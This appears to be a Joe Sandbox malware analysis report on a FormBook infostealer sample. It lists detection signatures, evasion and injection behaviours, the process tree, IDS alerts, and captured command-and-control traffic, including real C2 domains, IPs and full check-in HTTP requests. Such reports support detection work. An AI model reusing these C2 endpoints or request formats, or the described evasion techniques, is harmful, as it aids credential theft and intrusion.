Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qlG7x91YXH.exe

Overview

General Information

Sample name:qlG7x91YXH.exe
renamed because original name is a hash value
Original sample name:f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2.exe
Analysis ID:1587751
MD5:29e38e8c57aea7a49657e5960d12f3e9
SHA1:f7d3a8409c04c762baab30d5ef54becb38360c74
SHA256:f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • qlG7x91YXH.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\qlG7x91YXH.exe" MD5: 29E38E8C57AEA7A49657E5960D12F3E9)
    • svchost.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\qlG7x91YXH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sUcUmdUxGfN.exe (PID: 5308 cmdline: "C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7972 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • sUcUmdUxGfN.exe (PID: 2056 cmdline: "C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\qlG7x91YXH.exe", CommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", ParentImage: C:\Users\user\Desktop\qlG7x91YXH.exe, ParentProcessId: 7496, ParentProcessName: qlG7x91YXH.exe, ProcessCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", ProcessId: 7552, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\qlG7x91YXH.exe", CommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", ParentImage: C:\Users\user\Desktop\qlG7x91YXH.exe, ParentProcessId: 7496, ParentProcessName: qlG7x91YXH.exe, ProcessCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe", ProcessId: 7552, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T17:44:23.870873+010020507451Malware Command and Control Activity Detected192.168.2.449827156.226.63.1380TCP
                2025-01-10T17:44:48.763580+010020507451Malware Command and Control Activity Detected192.168.2.449985103.120.80.11180TCP
                2025-01-10T17:45:18.946952+010020507451Malware Command and Control Activity Detected192.168.2.450012104.21.80.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T17:44:23.870873+010028554651A Network Trojan was detected192.168.2.449827156.226.63.1380TCP
                2025-01-10T17:44:48.763580+010028554651A Network Trojan was detected192.168.2.449985103.120.80.11180TCP
                2025-01-10T17:45:18.946952+010028554651A Network Trojan was detected192.168.2.450012104.21.80.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T17:44:40.836089+010028554641A Network Trojan was detected192.168.2.449933103.120.80.11180TCP
                2025-01-10T17:44:43.538626+010028554641A Network Trojan was detected192.168.2.449951103.120.80.11180TCP
                2025-01-10T17:44:46.206284+010028554641A Network Trojan was detected192.168.2.449968103.120.80.11180TCP
                2025-01-10T17:45:11.259241+010028554641A Network Trojan was detected192.168.2.450009104.21.80.180TCP
                2025-01-10T17:45:13.879500+010028554641A Network Trojan was detected192.168.2.450010104.21.80.180TCP
                2025-01-10T17:45:16.476145+010028554641A Network Trojan was detected192.168.2.450011104.21.80.180TCP
                2025-01-10T17:45:25.172009+010028554641A Network Trojan was detected192.168.2.450013208.91.197.2780TCP
                2025-01-10T17:45:27.699824+010028554641A Network Trojan was detected192.168.2.450014208.91.197.2780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: qlG7x91YXH.exeVirustotal: Detection: 76%Perma Link
                Source: qlG7x91YXH.exeReversingLabs: Detection: 73%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: qlG7x91YXH.exeJoe Sandbox ML: detected
                Source: qlG7x91YXH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sUcUmdUxGfN.exe, 00000005.00000000.2188712734.00000000008AE000.00000002.00000001.01000000.00000005.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3014341923.00000000008AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDBBE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE68EE FindFirstFileW,FindClose,0_2_00DE68EE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE698F
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD076
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD3A9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9642
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE979D
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9B2B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5C97
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AACB20 FindFirstFileW,FindNextFileW,FindClose,6_2_02AACB20
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax6_2_02A99E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h6_2_031504DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49827 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49827 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49933 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49951 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49985 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49985 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49968 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 104.21.80.1:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.313333.xyz
                Source: Joe Sandbox ViewIP Address: 103.120.80.111 103.120.80.111
                Source: Joe Sandbox ViewASN Name: WEST263GO-HKWest263InternationalLimitedHK WEST263GO-HKWest263InternationalLimitedHK
                Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DECE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DECE44
                Source: global trafficHTTP traffic detected: GET /0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wuyyv4tq.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.313333.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficDNS traffic detected: DNS query: www.wuyyv4tq.top
                Source: global trafficDNS traffic detected: DNS query: www.313333.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mosquitoxp.lol
                Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global trafficDNS traffic detected: DNS query: www.epayassist.net
                Source: unknownHTTP traffic detected: POST /5jna/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.313333.xyzOrigin: http://www.313333.xyzCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Referer: http://www.313333.xyz/5jna/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d Data Ascii: h0Z4uv=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 16:44:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 16:45:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOlxFpRyH296IizPNQlSLUy2hO3Pl39IMyl%2FSWzgwbBXYVZr%2BegyCwIvurCcv%2BUDMNN3zUJQyxYuOBW0C1OGxIFttFwy0L%2FDTipon24y9w9FfZ5jZm8g0Yps4tfqvUYUDQP%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffe22cdf9d87d0e-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=802&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 